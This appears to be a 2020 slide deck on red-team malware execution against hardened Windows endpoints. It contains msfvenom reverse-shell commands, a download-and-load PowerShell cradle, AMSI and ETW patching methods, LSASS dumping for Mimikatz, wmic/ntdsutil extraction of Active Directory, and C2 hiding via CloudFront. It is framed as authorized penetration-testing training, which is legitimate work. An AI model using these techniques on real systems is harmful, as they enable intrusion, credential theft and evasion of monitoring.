
Move Aside Script Kiddies
Malware Execution in the Age of Advanced Defenses
Author: Joff Thyer © 2020
Black Hills Information Security
Who am I?

● Joff Thyer
○ Malware Developer, Researcher, and Pen Tester
○ Black Hills Information Security
○ SANS Certified Instructor of SEC573
○ Co-Host of Security Weekly Podcast
○ Musician, and lover of geeky things
Attacker / Threat Actor Emulation

● As penetration testers we want to emulate threat actors as realistically as possible.
● Our goal is to demonstrate risk through the emulation of a threat actor and the execution of real attacks.
● We also want to demonstrate real and actionable value at a reasonable cost.
Attacker / Threat Actor Emulation

● Defenders love tuning their skills, tools, tactics, and procedures.
● Cooperative or competitive?
○ Competitive is normally presented as a “Red Teaming” exercise
■ Longer in duration (more expensive) than most engagements
■ Not limited to the virtual domain.
○ Cooperative is presented as “Purple Teaming” or “Assumed Compromise” testing.
■ Scoped “insider threat” exercise.
■ Leverage real-world tactics to gain privilege, move laterally, and access sensitive data
Assumed Compromise

● Position the pen tester on a workstation asset within the organization in the role of an ordinary employee
○ Most organizations are using Windows 10 endpoints as the primary business desktop
● Have the pen tester work towards achieving privilege escalation, lateral movement, and sensitive data access
● Communicate openly and cooperatively with the defense team with respect to TTPs.
MITRE ATT&CK Matrix

● The MITRE ATT&CK Matrix is fabulous work and fast becoming a standard.
○ It is a taxonomy from an adversarial point of view
○ It describes how threat actors/adversaries:
■ Penetrate networks
■ Escalate privileges
■ Move laterally
■ Evade defenses
○ All organized into categorized tactics, each broken down into techniques!
Endpoint Defense Maturity

● Many things have changed over the last few years
○ Security defense vendors have upped the game
○ New paradigms and technologies:
■ Proactive threat hunting (hunt teaming) emerged
■ User Behavior Analytics products emerged
■ Endpoint Detection and Response products emerged
■ Network instrumentation and detection improved
■ More and more environments implemented application whitelisting
Attack Surface Changes

● Microsoft Windows 10 is better secured than prior releases
○ Windows Defender has improved considerably since its inception
■ Application Guard
■ Credential Guard
○ PowerShell has well-instrumented logging capabilities
■ Transcription, script block, and module logging
■ Constrained Language Mode
○ AMSI lets the installed anti-malware engine inspect script content at run time, just before the engine executes it
○ Event Tracing for Windows (ETW) is being leveraged by defensive solutions
More Capable Organizations

● Those with dedicated security operations budget and resources are leveraging the best-of-breed defense technologies available
● It is not uncommon to encounter environments that have implemented:
○ Strong and manually tuned antivirus solutions
○ Carbon Black / Bit9 or AppLocker application whitelisting
○ Solutions like Cylance, SentinelOne, or CrowdStrike Falcon
C2 Implant Execution

● Consider an environment where:
○ Unsigned EXE files will not run
○ Visual Basic Script will not run (CSCRIPT and WSCRIPT denied)
○ PowerShell is heavily tracked
○ The endpoint is forwarding event information
○ Defense solutions are using Windows Event Tracing
○ Egress traffic is filtered
○ The only Internet comms are via a web proxy
Metasploit

● Metasploit’s Meterpreter is an amazingly useful environment as a C2 channel. Many payload options:
○ reverse_https
○ reverse_tcp
● The “msfvenom” command still offers us a lot of flexibility
○ Output executable formats include:
■ exe, dll, powershell, jar, hta, vbs, war etc.
○ Transform output formats are very useful to incorporate into other tooling
■ Raw binary machine code
■ C#, C, Java, Python, Ruby ← the same machine code emitted as a byte array in each language
● Defense vendors universally have signatures for most if not ALL Metasploit machine code.
Why won’t my EXE run?

● Metasploit uses a built-in template EXE if you don’t specify one yourself (-x), and that template is well known to A/V.
● The shellcode gets “stuffed” into a new, randomly named PE/COFF section.
○ Note: with the “exe-only” format the shellcode replaces the .text section instead of adding a new one.
Sign your binary!
● If you obtain a code signing certificate, it will help you in a non-app-whitelisting environment (whitelisting keyed to hash, path, or an approved publisher will still block it).
● If using Cobalt Strike, consider configuring code signing into the Malleable C2 profile.
Metasploit: Why is my network traffic caught?

● Stage 1:
○ If you use a Metasploit reverse_https for example, the initial TLS handshake will be stopped: the default self-signed certificate the handler generates is fingerprinted by network defenses.
○ Unless… you use your own domain and your own legitimately signed certificate (HandlerSSLCert on the handler)
○ Let’s say thanks to Let’s Encrypt one more time here….
● Stage 2:
○ Unless you encode the stage AND you are using a server-side certificate for your own domain, the second stage will ALWAYS be busted as it crosses the wire.
○ Multi/handler:
■ set EnableStageEncoding true
■ set StageEncoder x64/zutto_dekiro
Metasploit encode/encrypt

● Encoders are not bad with msfvenom.
○ Encoders prepend a specific machine-code decoder stub that still has to run to “decode” the payload and write the result back into the memory region where the code resides.
○ That memory region must therefore have RWX permissions for the in-place decode to occur, which is itself a signal EDR looks for.
● Encryption options (--encrypt) are available in msfvenom also.
● My personal rules
○ Leverage the msfvenom “transform” formats and do your own custom encoding of the shellcode in another language.
○ Do NOT use second-stage (staged) payloads; use “single” (stageless) payloads.
○ Stick with 64-bit these days.
○ Customize to live off the land.
C2 - Customize and LOL

● You can execute shellcode from many different programming or scripting languages.
● The outline/sequence for execution is universally the same whether in the local process or targeting a remote process:
○ Create a memory buffer
○ Copy the shellcode into that buffer
○ Create a thread (or a process) whose start address points at that buffer, or call the buffer directly as a function.
● Living off the land binaries and scripts (LOLBAS) directly help with application whitelisting, because the signed Microsoft binary is what gets executed.
● But they can also help with A/V and EDR evasion.
C2 - Shellcode Obfuscation

● The goal here is to ensure that the shellcode does not exist in the delivery cradle (program) in its original form
○ Why? Because A/V solutions will immediately trigger on the raw bytes
● There are MANY possibilities here to customize/obfuscate
○ Encrypt / Decrypt (simple XOR is ok!)
○ Encode (base64 or other base-N) / Decode
○ Compress / Uncompress
● For symmetric encryption/decryption we require a key.
○ Fixed value in source code
○ Any other easily retrieved value, fetched across the Internet at run time (unlimited possibilities, and the shellcode cannot be recovered from the sample alone).
C2 - Defense Evasion

● Living off the land with .NET
○ With a little bit of programming you can use these signed Microsoft binaries to load and run your code:
■ InstallUtil.exe
■ MSBuild.exe
■ csc.exe
■ RegAsm.exe
■ regsvr32.exe
■ mshta.exe
● Without .NET
○ rundll32.exe and commodity malware frameworks
■ e.g. a DLL payload from Metasploit
○ Create a DLL shellcode delivery mechanism in C/C++ with the MFC API.
● Living-off-the-land techniques are being watched also: these binaries are on defenders’ lists, and EDR rules look at their parent process and command line.
C2 - Defense Evasion

● My favorite is to leverage AWS CloudFront
● Many potential choices for a HTTPS/TLS C2 channel
○ http://ask.thec2matrix.com/
○ Thank you Jorge Orchilles!
● Create a CloudFront distribution. Use the CloudFront TLS certificate
○ Send the “origin” traffic back to your C2 infrastructure.
○ You don’t even have to use “domain fronting”: the cloudfront.net hostname and certificate are enough.
○ Note: be careful when setting caching options, or the edge will answer your implant from cache instead of reaching your C2.
■ Trick is to “forward all” (headers, cookies, query strings) and allow all HTTP verbs/methods
C2 - Defense Evasion

● Don’t use a “staged” payload
● The second stage will just get busted coming across the network
○ Downside is a larger shellcode size.

Staged (slash in the payload name; a small stager downloads the rest):

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999

Stageless (underscore in the payload name; all of Meterpreter is in the shellcode):

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=9999

No Second Stage!
Example: C# Shellcode Exec

● This uses the function pointer delegation method: the executable buffer is wrapped in a delegate type so it can be invoked like any function.
● Assumes the shellcode is base64 encoded in the source.
● After we get the delegated function pointer, we just call it!
Did you know?

● You can load a .NET assembly directly in PowerShell
● You could use a PowerShell 2.0 “downgrade” (powershell.exe -version 2, which has no AMSI and no script block logging) with the bytes of a .NET assembly.
● Cradle might look like this:

PS C:\> $w = New-Object System.Net.WebClient
PS C:\> $p = $w.DownloadData("https://mydomain.com/dllfile")   # raw assembly bytes, never written to disk
PS C:\> [System.Reflection.Assembly]::Load($p)                 # load straight from the byte array
PS C:\> $a = New-Object Namespace.Class                        # placeholder: a public type in your assembly
PS C:\> $a.Method()                                            # placeholder: its entry method
.NET (MSIL) is Reversible

● Decompilers include
○ JetBrains dotPeek
○ Telerik JustDecompile
● Use an obfuscator/protector (ConfuserEx) to make reversing harder; it raises the cost but does not prevent it.
Recon/Discovery Artifacts

● If you have to write things to disk….
○ I like using C:\Users\Public (with a twist)
○ Lots of domains have internal PKI deployed
○ Don’t make it too easy, just encrypt your files! :)
■ The “E” attribute shown in the directory listing means the file is encrypted.
AntiMalware Scan Interface

● AMSI can be annoying
● .NET Framework 4.8 invokes AMSI when loading assemblies from memory (Assembly.Load(byte[])).
● PowerShell version 2.0 does not have AMSI (downgrade)
AMSI is a response to “fileless” threats

● What do I mean by that?
● Well, nothing is truly fileless, so the term is used very broadly
● But… the Microsoft scripting engines are an attractive way to get malware to run
○ JScript → HTML Application (HTA) based malware
○ PowerShell → often using “IEX” and base64 encoded script blocks
○ Visual Basic in Office macros
○ Visual Basic Scripting (wscript.exe / cscript.exe)
● It’s really about non-EXE based attacks, and not necessarily software vulnerability centric.
AMSI Amusement
Fame! … well not quite
Keep it Simple!

● https://github.com/yoda66/PowerStrip
○ All it does is remove comments from scripts.
AMSI Bypass

● You can load “amsi.dll” and patch it at runtime.
● Very useful if you intend to use .NET Assembly.Load()
● One method involves patching machine code in the “AmsiScanBuffer()” function.
○ Change the instruction at offset 0x1b of the function so the EDI/RDI register (which holds the buffer length) ends up zero.
○ Tricks AmsiScanBuffer into thinking the byte sequence is ZERO length, so nothing is scanned.
○ Caveat: the offset belongs to a particular build of amsi.dll; check that the bytes you expect are actually at that location before overwriting them.
● https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux
AMSI Bypass Example

● The code calls the AMSI bypass function if there is a second argument provided.
Event Tracing Bypass

● A lot of EDR solutions take advantage of Windows Event Tracing (ETW) to understand what is happening
● Event tracing will end up using the “EtwEventWrite()” function in NTDLL.DLL
○ The normal 32-bit function returns with RET 14h (0xC2 0x14 0x00), popping its five dword stdcall arguments; on x64 the epilogue is a plain RET (0xC3).
● If we write that return instruction at the beginning of “EtwEventWrite()”….
○ >>> No events logged from this process now! :) <<<
○ Or create bogus events for fun and profit
○ Caveat: this only silences user-mode providers inside the patched process (the .NET runtime provider in particular); kernel-side ETW providers are unaffected, and an EDR can spot the overwritten prologue.
● https://blog.xpnsec.com/hiding-your-dotnet-etw/
Combination Approaches

● Bypassing AMSI and ETW, for example, is reasonably simple to implement in C#
● Suggest you author your initial implants to leverage these techniques along with shellcode execution
● Such techniques can also be incorporated into post-exploitation activities.
Lateral Movement

● Why PsExec when you can RDP or WMI?
● When hunting for credentials, RDP to the target, then
● Use Task Manager to right-click lsass.exe and “Create dump file” (it is written under %TEMP%)
○ Copy the dump back to your home system and run Mimikatz (sekurlsa::minidump) OFFLINE!
○ Caveat: with Credential Guard enabled the dump will not contain the secrets, and some EDRs block or alert on opening a handle to LSASS.
Lateral Movement

● WMIC is incredibly useful
● You have a domain admin account
● Want a full copy of AD from the Domain Controller at 10.10.10.10?
○ Open a local CMD.EXE as the Domain Admin user (runas)
○ Create the output directory over the admin share, then have ntdsutil write an IFM (Install From Media) copy of ntds.dit and the registry hives into it; collect it from the same share afterwards:

C:\> mkdir \\10.10.10.10\c$\temp\ad
C:\> wmic /node:10.10.10.10 process call create "cmd.exe /c ntdsutil \"ac in ntds\" ifm \"cr fu c:\temp\ad\" q q"

● Want to run an InstallUtil command to pivot? (The DLL must already be on the target, e.g. copied via the admin share.)

C:\> wmic /node:10.10.10.10 process call create "cmd.exe /c \windows\microsoft.net\framework64\v4.0.30319\installutil.exe /logfile= /u \temp\file.dll"
In Conclusion...

● If you have the context of deployed EDR / whitelisting / advanced endpoint defenses
● Then…
○ Keep actual endpoint software execution to a minimum.
○ Establish your C2 channels with NO second-stage payload (stageless).
○ Use real domains with real certificates when transporting over HTTPS.
○ Leverage defense evasion such as AMSI bypass / ETW disable!
○ Obfuscate your own CUSTOM .NET assemblies.
○ Sign binaries.
○ Leverage proxies where possible (SOCKS4 and HTTP).
○ Leverage intermediaries (like CloudFront) to hide your C2 traffic.
Want to know more?

● Learn implant architecture with a custom C2 framework
○ Embed shellcode in C#, Python, and Go
○ Direct shellcode execution versus process injection
○ Evasion technique discussions
● Register here: https://bit.ly/JoffsC2Class
○ 4 sessions of 4 hours starting January 19, 2021
● https://wildwesthackinfest.com/training/enterprise-attacker-emulation-and-c2-implant-development-w-joff-thyer/
Questions / Comments?
